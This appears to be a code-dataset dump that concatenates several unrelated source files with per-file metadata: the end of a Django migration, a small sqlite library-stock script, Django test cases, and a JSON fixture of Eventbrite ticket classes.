field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='placework_set', to='apis_vocabularies.PlaceWorkRelation'),
),
migrations.AddField(
model_name='placeplace',
name='related_placeA',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='related_placeB', to='apis_entities.Place'),
),
migrations.AddField(
model_name='placeplace',
name='related_placeB',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='related_placeA', to='apis_entities.Place'),
),
migrations.AddField(
model_name='placeplace',
name='relation_type',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='placeplace_set', to='apis_vocabularies.PlacePlaceRelation'),
),
migrations.AddField(
model_name='placeevent',
name='related_event',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='placeevent_set', to='apis_entities.Event'),
),
migrations.AddField(
model_name='placeevent',
name='related_place',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='placeevent_set', to='apis_entities.Place'),
),
migrations.AddField(
model_name='placeevent',
name='relation_type',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='placeevent_set', to='apis_vocabularies.PlaceEventRelation'),
),
migrations.AddField(
model_name='personwork',
name='related_person',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='personwork_set', to='apis_entities.Person'),
),
migrations.AddField(
model_name='personwork',
name='related_work',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='personwork_set', to='apis_entities.Work'),
),
migrations.AddField(
model_name='personwork',
name='relation_type',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='personwork_set', to='apis_vocabularies.PersonWorkRelation'),
),
migrations.AddField(
model_name='personplace',
name='related_person',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='personplace_set', to='apis_entities.Person'),
),
migrations.AddField(
model_name='personplace',
name='related_place',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='personplace_set', to='apis_entities.Place'),
),
migrations.AddField(
model_name='personplace',
name='relation_type',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='personplace_set', to='apis_vocabularies.PersonPlaceRelation'),
),
migrations.AddField(
model_name='personperson',
name='related_personA',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='related_personB', to='apis_entities.Person'),
),
migrations.AddField(
model_name='personperson',
name='related_personB',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='related_personA', to='apis_entities.Person'),
),
migrations.AddField(
model_name='personperson',
name='relation_type',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='personperson_set', to='apis_vocabularies.PersonPersonRelation'),
),
migrations.AddField(
model_name='personinstitution',
name='related_institution',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='personinstitution_set', to='apis_entities.Institution'),
),
migrations.AddField(
model_name='personinstitution',
name='related_person',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='personinstitution_set', to='apis_entities.Person'),
),
migrations.AddField(
model_name='personinstitution',
name='relation_type',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='personinstitution_set', to='apis_vocabularies.PersonInstitutionRelation'),
),
migrations.AddField(
model_name='personevent',
name='related_event',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='personevent_set', to='apis_entities.Event'),
),
migrations.AddField(
model_name='personevent',
name='related_person',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='personevent_set', to='apis_entities.Person'),
),
migrations.AddField(
model_name='personevent',
name='relation_type',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='personevent_set', to='apis_vocabularies.PersonEventRelation'),
),
migrations.AddField(
model_name='institutionwork',
name='related_institution',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='institutionwork_set', to='apis_entities.Institution'),
),
migrations.AddField(
model_name='institutionwork',
name='related_work',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='institutionwork_set', to='apis_entities.Work'),
),
migrations.AddField(
model_name='institutionwork',
name='relation_type',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='institutionwork_set', to='apis_vocabularies.InstitutionWorkRelation'),
),
migrations.AddField(
model_name='institutionplace',
name='related_institution',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='institutionplace_set', to='apis_entities.Institution'),
),
migrations.AddField(
model_name='institutionplace',
name='related_place',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='institutionplace_set', to='apis_entities.Place'),
),
migrations.AddField(
model_name='institutionplace',
name='relation_type',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='institutionplace_set', to='apis_vocabularies.InstitutionPlaceRelation'),
),
migrations.AddField(
model_name='institutioninstitution',
name='related_institutionA',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='related_institutionB', to='apis_entities.Institution'),
),
migrations.AddField(
model_name='institutioninstitution',
name='related_institutionB',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='related_institutionA', to='apis_entities.Institution'),
),
migrations.AddField(
model_name='institutioninstitution',
name='relation_type',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='institutioninstitution_set', to='apis_vocabularies.InstitutionInstitutionRelation'),
),
migrations.AddField(
model_name='institutionevent',
name='related_event',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='institutionevent_set', to='apis_entities.Event'),
),
migrations.AddField(
model_name='institutionevent',
name='related_institution',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='institutionevent_set', to='apis_entities.Institution'),
),
migrations.AddField(
model_name='institutionevent',
name='relation_type',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='institutionevent_set', to='apis_vocabularies.InstitutionEventRelation'),
),
migrations.AddField(
model_name='eventwork',
name='related_event',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='eventwork_set', to='apis_entities.Event'),
),
migrations.AddField(
model_name='eventwork',
name='related_work',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='eventwork_set', to='apis_entities.Work'),
),
migrations.AddField(
model_name='eventwork',
name='relation_type',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='eventwork_set', to='apis_vocabularies.EventWorkRelation'),
),
migrations.AddField(
model_name='eventevent',
name='related_eventA',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='related_eventB', to='apis_entities.Event'),
),
migrations.AddField(
model_name='eventevent',
name='related_eventB',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='related_eventA', to='apis_entities.Event'),
),
migrations.AddField(
model_name='eventevent',
name='relation_type',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='eventevent_set', to='apis_vocabularies.EventEventRelation'),
),
]
| 54.307692
| 202
| 0.664935
| 1,335
| 12,708
| 6.130337
| 0.066667
| 0.043988
| 0.075269
| 0.11828
| 0.878055
| 0.878055
| 0.862903
| 0.771017
| 0.771017
| 0.689883
| 0
| 0.004
| 0.213015
| 12,708
| 233
| 203
| 54.540773
| 0.814319
| 0.00362
| 0
| 0.721239
| 1
| 0
| 0.243602
| 0.071406
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.00885
| 0
| 0.026549
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
997c4d98e9e71372a07cefc9aaf9e17cc6078c94
| 1,644
|
py
|
Python
|
Python_prAdd.py
|
shamikcodes-014/Library-Management-System
|
711a76c4a0bde7354882ca9d540e6b5fbda4404d
|
[
"MIT"
] | 1
|
2021-05-19T18:36:42.000Z
|
2021-05-19T18:36:42.000Z
|
Python_prAdd.py
|
shamikcodes-014/Library-Management-System
|
711a76c4a0bde7354882ca9d540e6b5fbda4404d
|
[
"MIT"
] | null | null | null |
Python_prAdd.py
|
shamikcodes-014/Library-Management-System
|
711a76c4a0bde7354882ca9d540e6b5fbda4404d
|
[
"MIT"
] | null | null | null |
def first():
import sqlite3
from tabulate import tabulate
conn = sqlite3.connect('Library.sqlite')
cur=conn.cursor()
cur.executescript('''
DROP TABLE IF EXISTS Main;
CREATE TABLE Main (
Book_Name TEXT UNIQUE,
Author TEXT,
Quantity INTEGER,
Book_id INTEGER NOT NULL PRIMARY KEY AUTOINCREMENT UNIQUE
)
''')
Book_name=input("Enter Book name to be added to stock ")
Author_name=input("Enter the author name ")
Quantity=int(input("Enter the quantity "))
cur.execute('''INSERT INTO Main (Book_name, Author, Quantity) VALUES (?,?,?)''', (Book_name, Author_name, Quantity))
conn.commit()
print("\nCurrent Stocks Present\n")
cur.execute("SELECT Book_name, Author, Quantity FROM Main")
myresult = cur.fetchall()
print(tabulate(myresult, headers=['Book Name', 'Author', 'In Stock'], tablefmt='psql'))
def normal():
import sqlite3
from tabulate import tabulate
conn = sqlite3.connect('Library.sqlite')
cur=conn.cursor()
Book_name=input("Enter Book name to be added to stock ")
Author_name=input("Enter the author name ")
Quantity=int(input("Enter the quantity "))
cur.execute('''INSERT INTO Main (Book_name, Author, Quantity) VALUES (?,?,?)''', (Book_name, Author_name, Quantity))
conn.commit()
print("\nCurrent Stocks Present\n")
cur.execute("SELECT Book_name, Author, Quantity FROM Main")
myresult = cur.fetchall()
print(tabulate(myresult, headers=['Book Name', 'Author', 'In Stock'], tablefmt='psql'))
| 26.95082
| 121
| 0.630779
| 197
| 1,644
| 5.192893
| 0.294416
| 0.101662
| 0.109482
| 0.086022
| 0.84262
| 0.84262
| 0.84262
| 0.84262
| 0.84262
| 0.84262
| 0
| 0.003215
| 0.243309
| 1,644
| 60
| 122
| 27.4
| 0.819132
| 0
| 0
| 0.702703
| 0
| 0
| 0.455408
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.054054
| false
| 0
| 0.108108
| 0
| 0.162162
| 0.108108
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
5137b3415755637d0cf34e40565746d70e178f13
| 151
|
py
|
Python
|
quince/application/workflows/__init__.py
|
OATML/quince
|
913d45aa968355bd368c336e96100e1b540ca188
|
[
"Apache-2.0"
] | 16
|
2021-03-17T16:59:43.000Z
|
2022-03-21T00:45:57.000Z
|
quince/application/workflows/__init__.py
|
OATML/quince
|
913d45aa968355bd368c336e96100e1b540ca188
|
[
"Apache-2.0"
] | 1
|
2021-11-23T12:50:43.000Z
|
2021-11-23T12:50:43.000Z
|
quince/application/workflows/__init__.py
|
OATML/quince
|
913d45aa968355bd368c336e96100e1b540ca188
|
[
"Apache-2.0"
] | 3
|
2021-03-15T17:17:09.000Z
|
2021-06-18T02:56:11.000Z
|
from quince.application.workflows import tuning
from quince.application.workflows import training
from quince.application.workflows import evaluation
| 30.2
| 51
| 0.874172
| 18
| 151
| 7.333333
| 0.444444
| 0.227273
| 0.477273
| 0.681818
| 0.818182
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.086093
| 151
| 4
| 52
| 37.75
| 0.956522
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 9
|
5158436f7f9d6c280e3a161240d36b0f0eafe5ee
| 232
|
py
|
Python
|
dcnn_visualizer/__init__.py
|
tochikuji/DNN-Visualizer
|
902eba04463c5c17ba81b85db7184a91d2cb4c49
|
[
"Apache-2.0"
] | 3
|
2018-02-09T07:21:36.000Z
|
2021-04-16T02:52:18.000Z
|
dcnn_visualizer/__init__.py
|
tochikuji/DNN-Visualizer
|
902eba04463c5c17ba81b85db7184a91d2cb4c49
|
[
"Apache-2.0"
] | 3
|
2018-01-11T05:47:02.000Z
|
2018-02-08T09:12:39.000Z
|
dcnn_visualizer/__init__.py
|
tochikuji/DNN-Visualizer
|
902eba04463c5c17ba81b85db7184a91d2cb4c49
|
[
"Apache-2.0"
] | null | null | null |
from dcnn_visualizer import tools
from dcnn_visualizer import visualizer
from dcnn_visualizer import occlusion
from dcnn_visualizer import traceable_chain
from dcnn_visualizer import traceable_nodes
from dcnn_visualizer import util
| 33.142857
| 43
| 0.896552
| 32
| 232
| 6.25
| 0.3125
| 0.24
| 0.54
| 0.72
| 0.33
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.103448
| 232
| 6
| 44
| 38.666667
| 0.961538
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
518bf7a57e4c32a31f4e78d3afc2c37735fa9605
| 239
|
py
|
Python
|
BARUS_CODE/BARUS_COMPUTER_CODE/Gripper.py
|
UdeS-GRO/S4H2019-BARUS
|
14bd4b45ccbd9f578fee7c72a7f754a85a0b8f6a
|
[
"MIT"
] | null | null | null |
BARUS_CODE/BARUS_COMPUTER_CODE/Gripper.py
|
UdeS-GRO/S4H2019-BARUS
|
14bd4b45ccbd9f578fee7c72a7f754a85a0b8f6a
|
[
"MIT"
] | 66
|
2019-01-16T17:24:19.000Z
|
2019-04-09T00:37:14.000Z
|
BARUS_CODE/BARUS_COMPUTER_CODE/Gripper.py
|
UdeS-GRO/S4H2019-BARUS
|
14bd4b45ccbd9f578fee7c72a7f754a85a0b8f6a
|
[
"MIT"
] | 2
|
2019-01-16T16:34:51.000Z
|
2020-01-08T19:25:20.000Z
|
import SerialCom
import Constant
def closeGripper():
SerialCom.send2IntToArduino(Constant.GRIPPER, Constant.GRIPPER_CLOSE)
def openGripper():
SerialCom.send2IntToArduino(Constant.GRIPPER, Constant.GRIPPER_OPEN)
| 17.071429
| 74
| 0.757322
| 22
| 239
| 8.136364
| 0.454545
| 0.335196
| 0.379888
| 0.458101
| 0.625698
| 0.625698
| 0
| 0
| 0
| 0
| 0
| 0.01005
| 0.167364
| 239
| 13
| 75
| 18.384615
| 0.889447
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| true
| 0
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
51a217cf4fa4270a5a7a06366de91670abb2959e
| 1,242
|
py
|
Python
|
tests/base/tests.py
|
BoyanPeychinov/farm_food_project
|
1cac80194bb8563b0f1926685a540e3162f43e82
|
[
"MIT"
] | null | null | null |
tests/base/tests.py
|
BoyanPeychinov/farm_food_project
|
1cac80194bb8563b0f1926685a540e3162f43e82
|
[
"MIT"
] | null | null | null |
tests/base/tests.py
|
BoyanPeychinov/farm_food_project
|
1cac80194bb8563b0f1926685a540e3162f43e82
|
[
"MIT"
] | null | null | null |
import datetime
from django.contrib.auth import get_user_model
from django.test import TestCase, Client
from django.urls import reverse
UserModel = get_user_model()
class ProducerProfileTestCase(TestCase):
user_email = 'test_user@abv.bg'
user_password = 'dasd7as!><2bdsa12347a@4=}{'
name = 'Gosho'
def setUp(self):
self.client = Client()
self.client.post(reverse('sign up'), data={
'email': self.user_email,
'password1': self.user_password,
'password2': 'dasd7as!><2bdsa12347a@4=}{',
'user_type': 'is_producer',
'name': self.name
})
self.user = UserModel.objects.get(email=self.user_email)
class ConsumerProfileTestCase(TestCase):
user_email = 'test_user@abv.bg'
user_password = 'dasd7as!><2bdsa12347a@4=}{'
name = 'Gosho'
def setUp(self):
self.client = Client()
self.client.post(reverse('sign up'), data={
'email': self.user_email,
'password1': self.user_password,
'password2': 'dasd7as!><2bdsa12347a@4=}{',
'user_type': 'is_customer',
'name': self.name
})
self.user = UserModel.objects.get(email=self.user_email)
| 27.6
| 64
| 0.612721
| 139
| 1,242
| 5.330935
| 0.294964
| 0.08637
| 0.102564
| 0.097166
| 0.720648
| 0.720648
| 0.720648
| 0.720648
| 0.720648
| 0.720648
| 0
| 0.038668
| 0.250403
| 1,242
| 45
| 65
| 27.6
| 0.75725
| 0
| 0
| 0.727273
| 0
| 0
| 0.204344
| 0.083669
| 0
| 0
| 0
| 0
| 0
| 1
| 0.060606
| false
| 0.181818
| 0.121212
| 0
| 0.424242
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
51b3ba46d06d4259ed71ada3bcca4dcbe34d14fb
| 236
|
py
|
Python
|
bolinette/defaults/services/__init__.py
|
bolinette/bolinette
|
b35a7d828c7d9617da6a8d7ac066e3b675a65252
|
[
"MIT"
] | 4
|
2020-11-02T15:16:32.000Z
|
2022-01-11T11:19:24.000Z
|
bolinette/defaults/services/__init__.py
|
bolinette/bolinette
|
b35a7d828c7d9617da6a8d7ac066e3b675a65252
|
[
"MIT"
] | 14
|
2021-01-04T11:06:59.000Z
|
2022-03-23T17:01:49.000Z
|
bolinette/defaults/services/__init__.py
|
bolinette/bolinette
|
b35a7d828c7d9617da6a8d7ac066e3b675a65252
|
[
"MIT"
] | null | null | null |
from bolinette.defaults.services.timezone import TimezoneService
from bolinette.defaults.services.file import FileService
from bolinette.defaults.services.role import RoleService
from bolinette.defaults.services.user import UserService
| 47.2
| 64
| 0.881356
| 28
| 236
| 7.428571
| 0.464286
| 0.25
| 0.403846
| 0.557692
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.067797
| 236
| 4
| 65
| 59
| 0.945455
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
cff29a2155def61d652f6483bae5a88751542994
| 12,179
|
py
|
Python
|
tests/ticketing/eb_ticket_list.py
|
bethlakshmi/gbe-divio-djangocms-python2.7
|
6e9b2c894162524bbbaaf73dcbe927988707231d
|
[
"Apache-2.0"
] | 1
|
2021-03-14T11:56:47.000Z
|
2021-03-14T11:56:47.000Z
|
tests/ticketing/eb_ticket_list.py
|
bethlakshmi/gbe-divio-djangocms-python2.7
|
6e9b2c894162524bbbaaf73dcbe927988707231d
|
[
"Apache-2.0"
] | 180
|
2019-09-15T19:52:46.000Z
|
2021-11-06T23:48:01.000Z
|
tests/ticketing/eb_ticket_list.py
|
bethlakshmi/gbe-divio-djangocms-python2.7
|
6e9b2c894162524bbbaaf73dcbe927988707231d
|
[
"Apache-2.0"
] | null | null | null |
ticket_dict1 = {
"pagination": {
"object_count": 2,
"continuation": None,
"page_count": 1,
"page_size": 50,
"has_more_items": False,
"page_number": 1
},
"ticket_classes": [
{
"actual_cost": None,
"actual_fee": {
"display": "$7.72",
"currency": "USD",
"value": 772,
"major_value": "7.72"
},
"cost": {
"display": "$100.00",
"currency": "USD",
"value": 10000,
"major_value": "100.00"
},
"fee": {
"display": "$7.72",
"currency": "USD",
"value": 772,
"major_value": "7.72"
},
"tax": {
"display": "$0.00",
"currency": "USD",
"value": 0,
"major_value": "0.00"
},
"resource_uri": "https://www.eventbriteapi.com/v3/events/158717222485/ticket_classes/567567567/",
"display_name": "Regular Price",
"name": "Regular Price",
"description": None,
"sorting": 1,
"donation": False,
"free": False,
"minimum_quantity": 1,
"maximum_quantity": 10,
"maximum_quantity_per_order": 10,
"on_sale_status": "AVAILABLE",
"has_pdf_ticket": True,
"order_confirmation_message": None,
"delivery_methods": [
"electronic"
],
"category": "admission",
"sales_channels": [
"online",
"atd"
],
"secondary_assignment_enabled": False,
"event_id": "12122222111111",
"image_id": None,
"id": "278648077",
"capacity": 300,
"quantity_total": 300,
"quantity_sold": 0,
"sales_start": "2021-06-02T04:00:00Z",
"sales_end": "2021-09-03T19:00:00Z",
"sales_end_relative": None,
"hidden": False,
"hidden_currently": False,
"include_fee": False,
"split_fee": False,
"hide_description": True,
"hide_sale_dates": False,
"auto_hide": False,
"payment_constraints": []
},
{
"actual_cost": None,
"actual_fee": None,
"cost": None,
"fee": None,
"tax": None,
"resource_uri": "https://www.eventbriteapi.com/v3/events/158717222485/ticket_classes/678678678/",
"display_name": "Super Special Free Admission",
"name": "Super Special Free Admission",
"description": None,
"sorting": 2,
"donation": False,
"free": True,
"minimum_quantity": 1,
"maximum_quantity": 1,
"maximum_quantity_per_order": 1,
"on_sale_status": "AVAILABLE",
"has_pdf_ticket": True,
"order_confirmation_message": None,
"delivery_methods": [
"electronic"
],
"category": "admission",
"sales_channels": [
"online",
"atd"
],
"secondary_assignment_enabled": False,
"event_id": "12122222111111",
"image_id": None,
"id": "278648079",
"capacity": 50,
"quantity_total": 50,
"quantity_sold": 0,
"sales_start": "2021-06-02T04:00:00Z",
"sales_end": "2021-09-03T19:00:00Z",
"sales_end_relative": None,
"hidden": True,
"hidden_currently": True,
"include_fee": False,
"split_fee": False,
"hide_description": True,
"hide_sale_dates": False,
"auto_hide": False,
"payment_constraints": []
}
]
}
ticket_dict2 = {
"pagination": {
"object_count": 2,
"continuation": None,
"page_count": 1,
"page_size": 50,
"has_more_items": False,
"page_number": 1
},
"ticket_classes": [
{
"actual_cost": None,
"actual_fee": {
"display": "$7.72",
"currency": "USD",
"value": 772,
"major_value": "7.72"
},
"cost": {
"display": "$100.00",
"currency": "USD",
"value": 10000,
"major_value": "100.00"
},
"fee": {
"display": "$7.72",
"currency": "USD",
"value": 772,
"major_value": "7.72"
},
"tax": {
"display": "$0.00",
"currency": "USD",
"value": 0,
"major_value": "0.00"
},
"resource_uri": "https://www.eventbriteapi.com/v3/events/158717222485/ticket_classes/3255985/",
"display_name": "Regular Price",
"name": "Regular Price",
"description": None,
"sorting": 1,
"donation": False,
"free": False,
"minimum_quantity": 1,
"maximum_quantity": 10,
"maximum_quantity_per_order": 10,
"on_sale_status": "AVAILABLE",
"has_pdf_ticket": True,
"order_confirmation_message": None,
"delivery_methods": [
"electronic"
],
"category": "admission",
"sales_channels": [
"online",
"atd"
],
"secondary_assignment_enabled": False,
"event_id": "2222333332323232",
"image_id": None,
"id": "278648077",
"capacity": 300,
"quantity_total": 300,
"quantity_sold": 0,
"sales_start": "2021-06-02T04:00:00Z",
"sales_end": "2021-09-03T19:00:00Z",
"sales_end_relative": None,
"hidden": False,
"hidden_currently": False,
"include_fee": False,
"split_fee": False,
"hide_description": True,
"hide_sale_dates": False,
"auto_hide": False,
"payment_constraints": []
},
{
"actual_cost": None,
"actual_fee": None,
"cost": None,
"fee": None,
"tax": None,
"resource_uri": "https://www.eventbriteapi.com/v3/events/158717222485/ticket_classes/890890890/",
"display_name": "Super Special Free Admission",
"name": "Super Special Free Admission",
"description": None,
"sorting": 2,
"donation": False,
"free": True,
"minimum_quantity": 1,
"maximum_quantity": 1,
"maximum_quantity_per_order": 1,
"on_sale_status": "AVAILABLE",
"has_pdf_ticket": True,
"order_confirmation_message": None,
"delivery_methods": [
"electronic"
],
"category": "admission",
"sales_channels": [
"online",
"atd"
],
"secondary_assignment_enabled": False,
"event_id": "2222333332323232",
"image_id": None,
"id": "278648079",
"capacity": 50,
"quantity_total": 50,
"quantity_sold": 0,
"sales_start": "2021-06-02T04:00:00Z",
"sales_end": "2021-09-03T19:00:00Z",
"sales_end_relative": None,
"hidden": True,
"hidden_currently": True,
"include_fee": False,
"split_fee": False,
"hide_description": True,
"hide_sale_dates": False,
"auto_hide": False,
"payment_constraints": []
}
]
}
ticket_dict3 = {
"pagination": {
"object_count": 2,
"continuation": None,
"page_count": 1,
"page_size": 50,
"has_more_items": False,
"page_number": 1
},
"ticket_classes": [
{
"actual_cost": None,
"actual_fee": {
"display": "$7.72",
"currency": "USD",
"value": 772,
"major_value": "7.72"
},
"cost": {
"display": "$100.00",
"currency": "USD",
"value": 10000,
"major_value": "100.00"
},
"fee": {
"display": "$7.72",
"currency": "USD",
"value": 772,
"major_value": "7.72"
},
"tax": {
"display": "$0.00",
"currency": "USD",
"value": 0,
"major_value": "0.00"
},
"resource_uri": "https://www.eventbriteapi.com/v3/events/158717222485/ticket_classes/098098098/",
"display_name": "Regular Price",
"name": "Regular Price",
"description": None,
"sorting": 1,
"donation": False,
"free": False,
"minimum_quantity": 1,
"maximum_quantity": 10,
"maximum_quantity_per_order": 10,
"on_sale_status": "AVAILABLE",
"has_pdf_ticket": True,
"order_confirmation_message": None,
"delivery_methods": [
"electronic"
],
"category": "admission",
"sales_channels": [
"online",
"atd"
],
"secondary_assignment_enabled": False,
"event_id": "44454545454545454",
"image_id": None,
"id": "278648077",
"capacity": 300,
"quantity_total": 300,
"quantity_sold": 0,
"sales_start": "2021-06-02T04:00:00Z",
"sales_end": "2021-09-03T19:00:00Z",
"sales_end_relative": None,
"hidden": False,
"hidden_currently": False,
"include_fee": False,
"split_fee": False,
"hide_description": True,
"hide_sale_dates": False,
"auto_hide": False,
"payment_constraints": []
},
{
"actual_cost": None,
"actual_fee": None,
"cost": None,
"fee": None,
"tax": None,
"resource_uri": "https://www.eventbriteapi.com/v3/events/158717222485/ticket_classes/987987987/",
"display_name": "Super Special Free Admission",
"name": "Super Special Free Admission",
"description": None,
"sorting": 2,
"donation": False,
"free": True,
"minimum_quantity": 1,
"maximum_quantity": 1,
"maximum_quantity_per_order": 1,
"on_sale_status": "AVAILABLE",
"has_pdf_ticket": True,
"order_confirmation_message": None,
"delivery_methods": [
"electronic"
],
"category": "admission",
"sales_channels": [
"online",
"atd"
],
"secondary_assignment_enabled": False,
"event_id": "44454545454545454",
"image_id": None,
"id": "278648079",
"capacity": 50,
"quantity_total": 50,
"quantity_sold": 0,
"sales_start": "2021-06-02T04:00:00Z",
"sales_end": "2021-09-03T19:00:00Z",
"sales_end_relative": None,
"hidden": True,
"hidden_currently": True,
"include_fee": False,
"split_fee": False,
"hide_description": True,
"hide_sale_dates": False,
"auto_hide": False,
"payment_constraints": []
}
]
}
| 32.651475
| 109
| 0.440348
| 993
| 12,179
| 5.147029
| 0.116818
| 0.007044
| 0.037566
| 0.030522
| 0.985717
| 0.985717
| 0.985717
| 0.985717
| 0.985717
| 0.985717
| 0
| 0.092448
| 0.422695
| 12,179
| 372
| 110
| 32.739247
| 0.634476
| 0
| 0
| 0.887097
| 0
| 0
| 0.40069
| 0.039412
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
5c80bb3ed2f47ea55e7f69b66744eace9ba2ba38
| 17,757
|
py
|
Python
|
v0/aia_eis_v0/goa/human_based/harmony_search/hs_0.py
|
DreamBoatOve/aia_eis
|
458b4d29846669b10db4da1b3e86c0b394614ceb
|
[
"MIT"
] | 1
|
2022-03-02T12:57:19.000Z
|
2022-03-02T12:57:19.000Z
|
v0/aia_eis_v0/goa/human_based/harmony_search/hs_0.py
|
DreamBoatOve/aia_eis
|
